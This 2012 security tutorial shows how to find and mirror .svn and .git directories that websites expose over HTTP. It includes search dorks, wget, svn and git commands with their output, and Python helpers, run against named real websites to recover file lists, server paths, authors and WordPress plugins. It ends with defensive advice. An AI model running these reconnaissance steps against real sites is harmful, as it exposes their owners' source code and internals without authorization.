Hacking SVN, GIT, and Mercurial

October 30, 2012 by Dejan Lukan

We all know that when programming in a team, small or large, having revision control in place is mandatory. We can choose from a number of revision control systems. The following ones are in widespread use worldwide:



Was one of the first revision control systems, and is therefore very simple, but can still be used for backing up files.


Subversion is one of the most widespread revision control systems today.


Git was created by Linus Torvalds, and its main feature is its decentralized design.


Mercurial is very similar to Git, but somewhat faster and simpler.


Similar to Git and Mercurial, but easier.

In this article we'll take a look at different revision control systems accessible over HTTP/HTTPS and what we can gain from them. Most revision control systems can be configured to be accessible over proprietary protocols, SSH, HTTP, etc. Most of the time we need to possess a username and password to get access to, for example, a Git repository protected by SSH. But HTTP/HTTPS is not a protocol where everything is strictly protected by default; with HTTP/HTTPS we must intentionally protect the directory where a revision control system lives to guard it against unauthorized use. This is why we'll take a look at what we can do with revision control systems that are publicly accessible over HTTP.

Getting usable info from SVN repository

If we Google for the string presented in the picture below, the results list publicly available SVN working copies that use HTTP as the transport protocol. The search string looks for ".svn" directories on pages whose title contains "Index of". If we search with ".svn" as the only criterion, only irrelevant results are found.

In the picture above we can see that the search query found two publicly accessible SVN systems:

- http://neo-layout.org/.svn/

- http://trafficbonus.com/.svn/

If we try to access one of those links, the SVN directory is presented to us as shown below:

In the .svn/ directory we can see standard SVN files and folders. This usually happens because the DocumentRoot (the web page) is itself an SVN working copy, so it contains the .svn/ folder, which is not appropriately protected. The .svn/ directory holds the administrative data for that working directory, which SVN uses to track the revision of each file and folder it contains. The entries file is the most important file in the .svn directory, because it contains information about every resource in the working copy directory: almost anything a Subversion client is interested in.
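To make the role of the entries file concrete, here is a minimal sketch of reading it in Python. It assumes the plain-text layout used by Subversion working copies before version 1.7 (a format number on the first line, then records separated by a form-feed character, each starting with the item name and its kind); newer clients keep this data in a SQLite file instead, so the sketch will not apply there. The function name and the sample data are our own and purely illustrative.

```python
def parse_svn_entries(text):
    """Return (name, kind) pairs from a pre-1.7 .svn/entries file.

    Assumed layout: first line is the format number, records are
    terminated by a form feed followed by a newline, and each record
    starts with the item name (empty for the directory itself) and
    its kind ("dir" or "file").
    """
    entries = []
    for index, record in enumerate(text.split("\x0c\n")):
        fields = record.split("\n")
        if index == 0:
            fields = fields[1:]  # drop the format number line
        if len(fields) < 2 or fields[1] not in ("dir", "file"):
            continue  # trailing empty record or unexpected content
        entries.append((fields[0], fields[1]))
    return entries


# Hand-written, heavily abbreviated sample (not taken from a real site).
SAMPLE = "10\n\ndir\n2429\n\x0c\nneo.kbd\nfile\n\x0c\nwindows\ndir\n\x0c\n"
print(parse_svn_entries(SAMPLE))
```

The first pair has an empty name because it describes the working copy directory itself; every other pair names a file or subdirectory under version control.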

What happens if we try to check out the project? We can see that in the output below:


# svn co http://neo-layout.org/.svn neo

svn: Repository moved permanently to 'http://neo-layout.org/.svn/'; please relocate


We can't check out the project, which makes sense, because we're trying to check out the .svn folder itself. We should check out the root of the project, which is /. If we try that, we get the output below:


# svn co http://neo-layout.org/

svn: OPTIONS of 'http://neo-layout.org': 200 OK (http://neo-layout.org)


We're not communicating with an SVN server, but with plain Apache instead: notice the 200 OK status code. We can't check out the project in the normal way. But let's not despair: we can still download the project manually by right-clicking every file and saving it to disk, or by writing a command that does that for us automatically. We can do that with the wget command as follows:


# wget -m -I .svn http://neo-layout.org/.svn/


This successfully downloads the .svn directory, as can be seen here:


# ls -al neo-layout.org/

total 56

drwxr-xr-x 3 eleanor eleanor 4096 Oct 2 16:18 .

drwxr-xr-x 75 eleanor eleanor 36864 Oct 2 16:18 ..

drwxr-xr-x 6 eleanor eleanor 4096 Oct 2 16:18 .svn

-rw-r--r-- 1 eleanor eleanor 5155 Jul 15 2011 index.html

-rw-r--r-- 1 eleanor eleanor 61 Jul 15 2011 robots.txt
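What wget does in mirror mode can be sketched in a few lines: read the "Index of" page, collect the links that point to files and subdirectories, and skip the column-sorting and parent-directory links. The following is a rough Python illustration of that link-collection step only (no downloading); the class and function names are ours, and the filtering rules are an assumption about how a typical Apache directory listing looks.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class IndexLinks(HTMLParser):
    """Collect the href attribute of every <a> tag on a page."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def listing_urls(page_url, html):
    """Return absolute URLs of the entries in a directory listing page."""
    parser = IndexLinks()
    parser.feed(html)
    urls = []
    for href in parser.hrefs:
        # Skip sort links ("?C=N;O=D"), absolute paths such as the parent
        # directory link, fragments, "../" and links to other sites.
        if href.startswith(("?", "/", "#", "..")) or "://" in href:
            continue
        urls.append(urljoin(page_url, href))
    return urls
```

Entries ending in a slash are subdirectories; a full mirror would fetch each of those pages and repeat the process.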


The directory neo-layout.org/ was created, which contains the important directory .svn, which in turn contains the entries file. Afterward we can cd into the working directory and issue SVN commands. An example of executing svn status is shown below:


# svn status

! neo.kbd

! stylesheet_ie7.css

! xkb.tgz

! de

! windows

! index_en.html

! favicon.ico

! mac

! installation

! grafik

! tastentierchen_fenster.svg

! kbdneo_ahk.exe

! svn

! neo.keylayout

! download

! portabel

! bsd

! kbdneo32.zip

! neo_portable.zip

! installiere_neo

! neo-logo.svg

! neo_portable.tar.gz

! chat

! tastentierchen_pingu.svg

! stylesheet.css

! neo.html

! tastentierchen_apfel.svg

! Compose.neo

! forum

! neo_kopf_trac_522x50.svg

! neo_de.xmodmap

! XCompose

! linux

! neo20.exe

! stylesheet_wiki.css

! portable

! kbdneo64.zip


The first column in the output above indicates whether an item was added, deleted, or otherwise changed; the full list of status characters is printed by svn help status. Here every item is marked with '!', which means it is missing, because we didn't really check out the repository but downloaded the .svn directory with wget. Nevertheless, we found out quite a lot about the actual files residing in the repository. Maybe those files are also accessible in the Apache DocumentRoot directory. Let's try to access stylesheet_ie7.css, which should be present.

In the picture above we can see the contents of the file stylesheet_ie7.css, which is indeed present in the DocumentRoot. We could have brute-forced the name of that file with DirBuster, but this way is easier and more accurate. We can try to download the other files as well, which might provide us with considerably more intel.
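Turning the svn status listing into a list of URLs to try is easy to automate. The sketch below is one possible way to do it in Python; it assumes every interesting line starts with '!' followed by the path, as in the output above, and the function names are our own.

```python
from urllib.parse import quote


def missing_items(status_output):
    """Return the paths that svn status reports as missing ('!')."""
    items = []
    for line in status_output.splitlines():
        if line.startswith("!"):
            path = line[1:].strip()
            if path:
                items.append(path)
    return items


def candidate_urls(base_url, status_output):
    """Build one URL per missing item, relative to the site root."""
    base = base_url.rstrip("/") + "/"
    # quote() percent-encodes characters that are unsafe in a URL path
    # but leaves "/" alone, so nested paths stay intact.
    return [base + quote(path) for path in missing_items(status_output)]
```

For example, candidate_urls("http://neo-layout.org", output) with the listing above would include http://neo-layout.org/stylesheet_ie7.css, the file we just opened in the browser.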

Let's also try to run svn update:


# svn update

svn: Unable to open an ra_local session to URL

svn: Unable to open repository 'file:///sol/svn/neo/www'


We were of course unable to execute that command successfully, but something interesting popped up: the path of the folder on the server that holds the actual repository, /sol/svn/neo/www. The svn info command provides additional information about the repository:


# svn info

Path: .

URL: file:///sol/svn/neo/www

Repository Root: file:///sol/svn/neo

Repository UUID: b9310e46-f624-0410-8ea1-cfbb3a30dc96

Revision: 2429

Node Kind: directory

Schedule: normal

Last Changed Author: martin_r

Last Changed Rev: 2399

Last Changed Date: 2011-06-25 10:56:02 +0200 (Sat, 25 Jun 2011)


Notice the author name, the last changed revision number, and the last changed date. For a site that was never meant to expose its repository, that's quite something.

Getting usable info from GIT repository

This is essentially the same as with SVN repositories, but let's discuss Git repositories a little further. We can use the same search query, this time ".git" with "intitle: index of", which finds indexed .git directories online. The picture below shows such a query made against the Google search engine:

Among many of the publicly accessible .git repositories, the following two were the first ones:

- www.claytonking.com/.git/

- www.bjphp.org/.git/

Let's again try to checkout the repository. We can do that with the git clone command as shown below:


# git clone http://www.claytonking.com/.git/

Cloning into 'www.claytonking.com'...

fatal: http://www.claytonking.com/.git/info/refs not valid: is this a git repository?


We are again unsuccessful in cloning the repository, for much the same reason as with SVN: the site is just a working tree sitting in the Apache DocumentRoot, and the server does not return a valid info/refs file, which git clone needs. If we try to clone from the root of the site instead, we're not successful either:


# git clone http://www.claytonking.com/

Cloning into 'www.claytonking.com'...

fatal: http://www.claytonking.com/info/refs not valid: is this a git repository?


Never mind; we'll use the same approach as we did with the SVN repository and mirror the directory with wget as follows:


# wget -m -I .git http://www.claytonking.com/.git/

--2012-10-02 16:59:25-- http://www.claytonking.com/.git/

Resolving www.claytonking.com...

Connecting to www.claytonking.com||:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 249 [text/html]

Saving to: `www.claytonking.com/.git/index.html'

100%[===================================================================================================================================================================>] 249 --.-K/s in 0s

Last-modified header missing -- time-stamps turned off.

2012-10-02 16:59:25 (27.6 MB/s) - `www.claytonking.com/.git/index.html' saved [249/249]

FINISHED --2012-10-02 16:59:25--

Total wall clock time: 0.3s

Downloaded: 1 files, 249 in 0s (27.6 MB/s)


The wget command failed to download the .git directory. Why? We can quickly find out that access to that directory is denied as can be seen in the picture below:

So that repository is properly secured against our attack. Let's try another repository located at http://www.bjphp.org/.git/. If we try to open it in a web browser, it opens up successfully, which means that the wget command will also succeed. The following picture presents accessing the .git/ repository at host www.bjphp.org:

To download the repository we can execute the following command:


# wget -m -I .git http://www.bjphp.org/.git/


Once the repository is downloaded, we can cd into it and issue git commands. Note that the repository is quite big, so it will take some time to be fully downloaded.

If we try to execute git status we get an error about a bad HEAD object:


# git status

fatal: bad object HEAD


But we should be able to execute the git status command, since all the information is contained in the .git/ folder. First we need to correct the HEAD pointer so that it points to an existing commit. We can do that by editing .git/refs/heads/master and replacing the non-existent hash with an existing one. All the hashes can be found by executing the command below:


# find .git/objects/










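The output was truncated, but we can still see six hashes that we can use. A full object ID is 40 hexadecimal characters: the two-character directory name under .git/objects/ followed by the 38-character file name. Let's put the last hash (file name 86f0ae6bb797bf29700cb1d0d93e5e30a4e72b, prefixed with its directory name) into the .git/refs/heads/master file and then execute the git status command: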


# git status | head


# Initial commit


# Changes to be committed:

# (use "git rm --cached <file>..." to unstage)


# new file: mainsite/.files.list

# new file: mainsite/index.php

# new file: mainsite/license.txt

# new file: mainsite/readme.html
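Picking a hash for .git/refs/heads/master by hand, as we did before running git status, is hit and miss, because only some of the objects under .git/objects/ are commits. Loose Git objects are zlib-compressed and start with a short header naming their type, so a small script can tell us which IDs are worth trying. This is a minimal Python sketch under that assumption; it only looks at loose objects (not pack files), and the function names are our own.

```python
import os
import zlib


def loose_objects(git_dir):
    """Yield (object_id, type) for each readable loose object."""
    objects_dir = os.path.join(git_dir, "objects")
    for prefix in sorted(os.listdir(objects_dir)):
        subdir = os.path.join(objects_dir, prefix)
        # Loose objects live in two-character directories; this skips
        # pack/, info/ and stray files left behind by the mirror.
        if len(prefix) != 2 or not os.path.isdir(subdir):
            continue
        for name in sorted(os.listdir(subdir)):
            if len(name) != 38:
                continue  # e.g. an index.html saved by wget
            with open(os.path.join(subdir, name), "rb") as handle:
                raw = handle.read()
            try:
                data = zlib.decompress(raw)
            except zlib.error:
                continue  # partially downloaded or not a Git object
            # The header looks like b"commit 243" and ends at the first NUL.
            header = data.split(b"\x00", 1)[0]
            obj_type = header.split(b" ", 1)[0].decode("ascii", "replace")
            yield prefix + name, obj_type


def commit_ids(git_dir):
    """Return the full 40-character IDs of all loose commit objects."""
    return [oid for oid, kind in loose_objects(git_dir) if kind == "commit"]


# Usage (inside the mirrored site directory): commit_ids(".git")
```

Any ID returned by commit_ids() is a candidate for refs/heads/master; which one is the most recent still has to be worked out from the commit contents.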


The git status command succeeded: it printed the modified, added, and deleted files as of commit 86f0ae6bb797bf29700cb1d0d93e5e30a4e72b. From this we can tell that the site is running WordPress, and all of the file names are printed as well. Afterward we can easily find out the names of the plugins the website is using with the command below:


# git status | grep "wp-content/plugins" | sed 's/.*wp-content\/plugins\/\([^\/]*\).*/\1/' | sort | uniq | grep -v ".php"
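The same extraction can be sketched in Python, which avoids the escaping that the sed expression needs. This is an illustrative variant, not an exact port: instead of filtering out names that contain ".php" afterward, it only accepts names that are followed by a slash, that is, plugin directories. The function name is ours, and the input is assumed to be the text printed by git status.

```python
import re

# A plugin directory is the path component right after wp-content/plugins/
# that is itself followed by another slash.
PLUGIN_RE = re.compile(r"wp-content/plugins/([^/\s]+)/")


def plugin_names(status_output):
    """Return the sorted, de-duplicated plugin directory names."""
    return sorted({match.group(1) for match in PLUGIN_RE.finditer(status_output)})
```

Single-file plugins that sit directly in wp-content/plugins/ are skipped by this pattern, just as the final grep in the pipeline above drops them.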







We could have written a better sed expression, but this one works for our example. If we try to access one of the listed files in a web browser, we can see that the files are indeed accessible, as can be seen below:

Conclusion

We've seen how to pull various information from SVN and Git repositories, but we could easily have done the same with other repository types. Having a repository publicly accessible can even lead to total website defacement, for example if one of the discovered file names belongs to a file that contains passwords and is itself accessible via the web browser.


To protect ourselves we should never leave unprotected .svn/ or .git/ directories online for everyone to see. We should at the very least write a corresponding .htaccess file that denies access to them.
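Once protection is in place, it is worth confirming from the outside that the metadata is really unreachable. The following Python sketch probes a site we control for a few well-known metadata files and reports which ones come back with status 200. The probe list and function names are our own choices, and the check is deliberately simple: it assumes that a protected path answers with something other than 200.

```python
import urllib.error
import urllib.request

# One characteristic file per system: Git, pre-1.7 Subversion, Mercurial.
PROBE_PATHS = (".git/HEAD", ".svn/entries", ".hg/requires")


def http_status(url, timeout=10):
    """Return the HTTP status code for a GET request to url."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as error:
        return error.code  # 403, 404, ... are answers too


def exposed_metadata(base_url, status_of=http_status):
    """Return the probe paths that the server serves with status 200."""
    base = base_url.rstrip("/") + "/"
    return [path for path in PROBE_PATHS if status_of(base + path) == 200]


# Usage against our own site: exposed_metadata("http://www.example.com")
```

An empty list means none of the probed files was served; connection errors are not caught here and will surface as exceptions.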

Dejan Lukan

Dejan Lukan is a security researcher for InfoSec Institute and a penetration tester from Slovenia. He is very interested in finding new bugs in real-world software products with source code analysis, fuzzing, and reverse engineering. He also has a great passion for developing his own simple scripts for security-related problems and learning about new hacking techniques. He knows a great deal about programming languages, as he can write in a couple of dozen of them. His other passions are antivirus bypassing techniques, malware research, and operating systems, mainly Linux, Windows, and BSD. He also has his own blog, available here: http://www.proteansec.com/.